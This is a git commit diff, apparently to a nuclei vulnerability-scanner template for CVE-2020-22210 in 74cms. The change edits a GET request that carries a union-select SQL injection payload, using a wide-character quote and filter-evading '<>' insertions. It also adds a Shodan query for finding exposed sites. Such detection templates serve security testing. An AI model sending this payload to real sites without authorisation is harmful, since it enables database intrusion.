Update CVE-2020-22210.yaml

patch-1
Ritik Chaddha 2022-06-30 08:27:56 +05:30 committed by GitHub
parent f1a0cc6cc5
commit 74ae48a06f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 5 additions and 2 deletions

View File

@ -19,15 +19,18 @@ info:
shodan-query: http.html:"74cms" shodan-query: http.html:"74cms"
tags: cve,cve2020,74cms,sqli tags: cve,cve2020,74cms,sqli
variables:
num: "999999999"
requests: requests:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5("{{randstr}}"),5,6,7,8,9%23' - '{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23'
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- '{{md5("{{randstr}}")}}' - '{{md5({{num}})}}'
# Enhanced by cs on 2022/06/21 # Enhanced by cs on 2022/06/21